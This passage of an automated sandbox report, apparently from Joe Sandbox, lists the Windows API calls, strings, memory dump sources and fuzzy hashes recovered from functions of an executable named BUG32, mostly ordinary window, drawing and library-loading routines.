                            • EnumChildWindows.USER32(00000001,004094B7,?), ref: 00409662
                            • EnumChildWindows.USER32(00000001,004094B7,?), ref: 00409671
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Child$EnumWindows$FocusWindowstrcmp$ActiveClassLongNameParent
                            • String ID: ComboBoxEx32$MDI_ChildClass$SysIPAddress32
                            • API String ID: 50363231-1864405207
                            • Opcode ID: f2cffcd2d7ef1bb77eeb4cc6d7a7e92c818ef49fc70204b9b0393e5829c9b76a
                            • Instruction ID: 26fe4e798859501f2d6379b88ef2dfb7c5855c6eb945bb74e6c3b3aa94f9ecbd
                            • Opcode Fuzzy Hash: f2cffcd2d7ef1bb77eeb4cc6d7a7e92c818ef49fc70204b9b0393e5829c9b76a
                            • Instruction Fuzzy Hash: 1C31AF72C00209ABCF219FA1DD84DAEBBB8EF84354B20083BE501B3291D73A4E05DB5D
                            APIs
                            • GetWindow.USER32(00000000,00000004), ref: 004087BF
                            • SetActiveWindow.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,0000000D,00000004,00000003,0000003D,0000004B,0000004E,00000014,0040F1CE,00000002), ref: 004087D0
                            • RemovePropA.USER32(00000000,PB_WindowID), ref: 004087E4
                            • RemovePropA.USER32(00000000,PB_DropAccept), ref: 004087ED
                            • RevokeDragDrop.OLE32(00000000), ref: 004087F6
                            • SendMessageA.USER32(?,00000221,00000000,00000000), ref: 0040880D
                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000,00000002,00000000,0000000D,00000004,00000003,0000003D,0000004B,0000004E), ref: 00408857
                            • DestroyAcceleratorTable.USER32(?), ref: 00408860
                            • DeleteObject.GDI32(?), ref: 0040886E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: PropRemoveWindow$AcceleratorActiveDeleteDestroyDragDropFreeHeapMessageObjectRevokeSendTable
                            • String ID: PB_DropAccept$PB_WindowID$WindowClass_%d
                            • API String ID: 1930355387-976223216
                            • Opcode ID: 334c028b64b460623fa04c29ed120574f57621e9f42524fffb5077146094b85e
                            • Instruction ID: 29b47f1e9af5ba6aed46dc0ea766766d4434ca9ff44da86252511b840b7cf14f
                            • Opcode Fuzzy Hash: 334c028b64b460623fa04c29ed120574f57621e9f42524fffb5077146094b85e
                            • Instruction Fuzzy Hash: 6E318E32500204EBDB316F61DD09E4A7B79EF44740F14853AF981B25F1DB7A98A59B4C
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 00407043
                            • memset.MSVCRT ref: 00407050
                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000), ref: 00407060
                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00407083
                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00407090
                            • strncpy.MSVCRT ref: 004070B0
                            • strlen.MSVCRT ref: 004070BF
                            • CoTaskMemFree.OLE32(00001000,?,?,?,?,?,?,00000000), ref: 00407132
                            • strlen.MSVCRT ref: 00407139
                            • FreeLibrary.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000), ref: 00407155
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: AddressFreeLibraryProcstrlen$InitializeLoadTaskmemsetstrncpy
                            • String ID: P$SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                            • API String ID: 1137656791-2123664527
                            • Opcode ID: ca59d1770f075dc1c719dc75b641f4b63c6f9e68c7d55a94cb94d8fb9a02c9bc
                            • Instruction ID: 20a94d6c92356abb5b9d7922ed251b52c1c0b6cc075764502a9a4f7ca9eac603
                            • Opcode Fuzzy Hash: ca59d1770f075dc1c719dc75b641f4b63c6f9e68c7d55a94cb94d8fb9a02c9bc
                            • Instruction Fuzzy Hash: F3412AB1C04218AFCF11AFA5DC459DEBBB8AF04304F10847AF514B6292D779AA48CF59
                            APIs
                            • sprintf.MSVCRT ref: 00408956
                            • memset.MSVCRT ref: 00408972
                            • RegisterClassA.USER32(00000015), ref: 004089B7
                            • AdjustWindowRectEx.USER32(00000000,00000008,00000000,00000000), ref: 00408A32
                            • CreateWindowExA.USER32(00000000,?,00000000,00000008,80000000,80000000,00000000,0040F1F8,00410350,00000000,00000000), ref: 00408A92
                            • ShowWindow.USER32(00000000,00000001,?,?,?,?,?,00000000), ref: 00408AED
                            • HeapAlloc.KERNEL32(00000000,0000000C,?,?,?,?,?,00000000), ref: 00408B13
                            • CreateAcceleratorTableA.USER32(?,?,?,?,?,?,?,00000000), ref: 00408B58
                            • SetPropA.USER32(00000000,PB_WindowID,00000001), ref: 00408B84
                            • UnregisterClassA.USER32(?), ref: 00408BA3
                              • Part of subcall function 0040C3CF: memset.MSVCRT ref: 0040C3F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Window$ClassCreatememset$AcceleratorAdjustAllocHeapPropRectRegisterShowTableUnregistersprintf
                            • String ID: PB_WindowID$WindowClass_%d
                            • API String ID: 1188667036-2937193648
                            • Opcode ID: dfabf5a2749828486cef885ca2b819027d9ec78a50df56a78b20eccf017a4791
                            • Instruction ID: 1b37682574fecad593b8420a8c68361c271cea9cf1c1dc633f43711a53431bb7
                            • Opcode Fuzzy Hash: dfabf5a2749828486cef885ca2b819027d9ec78a50df56a78b20eccf017a4791
                            • Instruction Fuzzy Hash: 8C817DB1900209EFDB21CFA4DD44B9A7BF5FB48314F10862AE999A72E0C7789954CF09
                            APIs
                            • GetDC.USER32(?), ref: 00407B5D
                            • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00407B6C
                            • SelectObject.GDI32(?,00000000), ref: 00407B76
                            • GetWindowTextLengthA.USER32(?), ref: 00407B81
                            • HeapAlloc.KERNEL32(00000000,00000001), ref: 00407B93
                            • GetWindowTextA.USER32(?,?,?), ref: 00407BAA
                            • SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 00407BBA
                            • DrawTextA.USER32(?,?,?,?,00000400), ref: 00407BD2
                            • GetWindowLongA.USER32(?,000000EC), ref: 00407BE2
                            • GetSystemMetrics.USER32(0000002D), ref: 00407BF1
                            • GetSystemMetrics.USER32(0000002E), ref: 00407BFC
                            • HeapFree.KERNEL32(00000000,?), ref: 00407C18
                            • SelectObject.GDI32(?,?), ref: 00407C24
                            • ReleaseDC.USER32(?,?), ref: 00407C2F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: TextWindow$HeapMetricsObjectSelectSystem$AllocDrawFreeLengthLongMessageRectReleaseSend
                            • String ID:
                            • API String ID: 2456011057-0
                            • Opcode ID: 7477e2c598b5e09a3c491d800024e4f21f9728dd088feaf742d765d20337b594
                            • Instruction ID: 82fd6db1e028314bcfc627c67d6b158a086662207ee2919ae849d65c94ced72f
                            • Opcode Fuzzy Hash: 7477e2c598b5e09a3c491d800024e4f21f9728dd088feaf742d765d20337b594
                            • Instruction Fuzzy Hash: 043105B6900108FFEB229FA4ED489AE7BB9FF48340F104475FA01E6170C7729A55DB65
                            APIs
                            • LoadLibraryA.KERNEL32(COMCTL32.DLL,00000000,?,?,?,?,?,?,?,?), ref: 004097E7
                            • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004097FB
                            • memset.MSVCRT ref: 0040980C
                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00409837
                            • LoadLibraryA.KERNEL32(uxtheme.dll,?,?,?,?,?,?,?,?), ref: 00409842
                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00409850
                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00409873
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Library$AddressFreeLoadProc$memset
                            • String ID: COMCTL32.DLL$DllGetVersion$IsAppThemed$uxtheme.dll
                            • API String ID: 4277437538-2634860346
                            • Opcode ID: e4525788d054863be85dfd091e3dbfa01b6c63d909e70262bb3b32e3daa0e374
                            • Instruction ID: 15f655ad5458681635e20186fa11d58ec13a83503aa0d2f11d0add2be4637de4
                            • Opcode Fuzzy Hash: e4525788d054863be85dfd091e3dbfa01b6c63d909e70262bb3b32e3daa0e374
                            • Instruction Fuzzy Hash: C6118472D10219A7DB10ABA68C45BAEB7B8AF04704F148436E501F22C2D7B8D9058769
                            APIs
                            • GetDC.USER32(?), ref: 004080F2
                            • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00408101
                            • SelectObject.GDI32(?,00000000), ref: 0040810B
                            • GetWindowTextLengthA.USER32(?), ref: 00408116
                            • HeapAlloc.KERNEL32(00000000,00000001), ref: 0040812A
                            • GetWindowTextA.USER32(?,00000000,00000001), ref: 0040813B
                            • GetTextExtentPoint32A.GDI32(?,?,00000000,?), ref: 0040814C
                            • GetSystemMetrics.USER32(0000002D), ref: 0040815A
                            • GetSystemMetrics.USER32(0000002E), ref: 00408168
                            • HeapFree.KERNEL32(00000000,?), ref: 00408188
                            • SelectObject.GDI32(?,?), ref: 00408194
                            • ReleaseDC.USER32(?,?), ref: 0040819F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Text$HeapMetricsObjectSelectSystemWindow$AllocExtentFreeLengthMessagePoint32ReleaseSend
                            • String ID:
                            • API String ID: 1864001859-0
                            • Opcode ID: e906c765931e71e866749475ed603114848cf4f8f00ed9ff06d81cda680a7142
                            • Instruction ID: 9e23aee32681329f3ada14cee8c59c95c4f743f5dc276e4379c538a0e622e3d8
                            • Opcode Fuzzy Hash: e906c765931e71e866749475ed603114848cf4f8f00ed9ff06d81cda680a7142
                            • Instruction Fuzzy Hash: 37314975800209FFDB119F94ED489ADBBB9FF48340F10847AF600A7260D7729A15DF54
                            APIs
                            • sprintf.MSVCRT ref: 0040DB1C
                            • GetPropA.USER32(00000000,?), ref: 0040DB37
                            • GetPropA.USER32(00408B76,?), ref: 0040DB59
                            • HeapFree.KERNEL32(00000000,?,?,00000000,00000008), ref: 0040DB72
                            • HeapAlloc.KERNEL32(00000008,00000028,?,00000000,00000008), ref: 0040DBAA
                            • HeapAlloc.KERNEL32(00000008,00000018,?,00000000,00000008), ref: 0040DBCB
                            • SetPropA.USER32(00408B76,?,00000000), ref: 0040DBD7
                            • SetWindowLongA.USER32(00408B76,000000FC,0040DA11), ref: 0040DBE5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: HeapProp$Alloc$FreeLongWindowsprintf
                            • String ID: PB_GadgetStack_%i
                            • API String ID: 802322696-1190326050
                            • Opcode ID: a11799b84e58375b5c7664cd1cb30c189156ae019023f50d68b8dbbec72719bf
                            • Instruction ID: e133310c2a0cb6c776a4bb0f894e767d45d016417af5286576255876e3c341c2
                            • Opcode Fuzzy Hash: a11799b84e58375b5c7664cd1cb30c189156ae019023f50d68b8dbbec72719bf
                            • Instruction Fuzzy Hash: 01412975900704EFD720DFA4D884A56BBF5FB08311F11893EE456A37A0D7B4A948CF54
                            APIs
                            • GetWindowLongA.USER32(?,000000F4), ref: 0040841B
                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00408448
                            • RemovePropA.USER32(?,PB_ID), ref: 00408473
                            • RemovePropA.USER32(?,PB_DropAccept), ref: 0040847B
                            • RevokeDragDrop.OLE32(?), ref: 00408482
                            • SetWindowLongA.USER32(?,000000F4,000000FF), ref: 0040848D
                            • DefWindowProcA.USER32(?,?,?,?), ref: 004084C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Window$LongProcPropRemove$CallDragDropRevoke
                            • String ID: PB_DropAccept$PB_ID
                            • API String ID: 2605631428-3688647018
                            • Opcode ID: edc2da24013948d4ebc185b15efecff24735f91ca1bd17ab26c7bf82fd1c0b13
                            • Instruction ID: b3813ae393b931e35148cd626c0718d6083fd7b618999e0e9e950c80eae018d3
                            • Opcode Fuzzy Hash: edc2da24013948d4ebc185b15efecff24735f91ca1bd17ab26c7bf82fd1c0b13
                            • Instruction Fuzzy Hash: 76118132004119BFCB11AF65ED84CAF3B69EB457747108739F974722E0DB399C21AB6A
                            APIs
                            • sprintf.MSVCRT ref: 0040DA28
                            • GetPropA.USER32(?,?), ref: 0040DA37
                            • HeapFree.KERNEL32(00000000,?), ref: 0040DA8C
                            • HeapFree.KERNEL32(00000000,00000000), ref: 0040DA96
                            • RemovePropA.USER32(?,?), ref: 0040DA9F
                            • CallWindowProcA.USER32(?,?,00000082,?,?), ref: 0040DABA
                            • DefWindowProcA.USER32(?,?,?,?), ref: 0040DACE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: FreeHeapProcPropWindow$CallRemovesprintf
                            • String ID: PB_GadgetStack_%i
                            • API String ID: 3302030571-1190326050
                            • Opcode ID: 62e4b6846eced0e9f77a6e7e943c08e56267dea8633aa9b30b64dbc44f9e1794
                            • Instruction ID: b59a075a10752d77f6994d6115e8aba887d0449c82395f46d74ac2d1ae7c6c93
                            • Opcode Fuzzy Hash: 62e4b6846eced0e9f77a6e7e943c08e56267dea8633aa9b30b64dbc44f9e1794
                            • Instruction Fuzzy Hash: 0A214572A00109FFCF11AF90ED84CAA7B7AFB44354B04803AF905A62B0D3759E69DF59
                            APIs
                            • GetObjectA.GDI32(?,00000018,?), ref: 00409931
                            • CreateCompatibleDC.GDI32(00000000), ref: 00409958
                            • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 0040997E
                            • GetDIBits.GDI32(?,?,00000000,?,00000000,?,00000000), ref: 004099BD
                            • HeapFree.KERNEL32(00000000,00000000), ref: 004099CF
                            • DeleteDC.GDI32(?), ref: 004099DA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Heap$AllocBitsCompatibleCreateDeleteFreeObject
                            • String ID: (
                            • API String ID: 3437057831-3887548279
                            • Opcode ID: 17fb1a224a58eb2ffcf75e32e3695896d0f542b7e41cafb89228af5b7bd124bc
                            • Instruction ID: c5d3a1bc1804ca2e9e5044f871a4cb7a5c3aa3e4d49201d7016f5632aebe1015
                            • Opcode Fuzzy Hash: 17fb1a224a58eb2ffcf75e32e3695896d0f542b7e41cafb89228af5b7bd124bc
                            • Instruction Fuzzy Hash: 7F213CB5501128AFCB219FA5DD489EFBBB9FF48750B10403AF905E7260D7708D05DBA5
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: ceil$floormalloc$fabs
                            • String ID:
                            • API String ID: 2390561812-0
                            • Opcode ID: 5704932473d7f0e16d98b98da3e24a8a6751b0ca13264c6d76022fe735e25589
                            • Instruction ID: 1504102e3a910337c7da64a2144d3e2c7e7873ef2db285f3a606790d7ddb58a8
                            • Opcode Fuzzy Hash: 5704932473d7f0e16d98b98da3e24a8a6751b0ca13264c6d76022fe735e25589
                            • Instruction Fuzzy Hash: E56149B1D04519EBDF05BF91E8856EEBBB4FF44310F2144AAE481762C2DB398C60CB99
                            APIs
                              • Part of subcall function 0040AEC3: EnterCriticalSection.KERNEL32(00410764,?,00000000,?,00408D19,?,?,00000000,00000000,0040F1F8,00000007,00000000,00001000,00000000,00000000), ref: 0040AEE5
                              • Part of subcall function 0040AEC3: LeaveCriticalSection.KERNEL32(00410764,?,00000000,?,00408D19,?,?,00000000,00000000,0040F1F8,00000007,00000000,00001000,00000000,00000000), ref: 0040AFB1
                            • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000003), ref: 00408D3E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeaveMessagePeek
                            • String ID:
                            • API String ID: 2031501597-0
                            • Opcode ID: d69f005db890a9cb189aa4875cef750e72568e932b18d4f43f13ea27542dcfb0
                            • Instruction ID: 2bb90d03f0796acd5cfafa48456c7f11328552d289e60bf6d17ddd9c9fa9f7a1
                            • Opcode Fuzzy Hash: d69f005db890a9cb189aa4875cef750e72568e932b18d4f43f13ea27542dcfb0
                            • Instruction Fuzzy Hash: A4218174500705EBC7309BA6DE89DAB7ABCEFD4740B10463EF491A32D0DA389841CB29
                            APIs
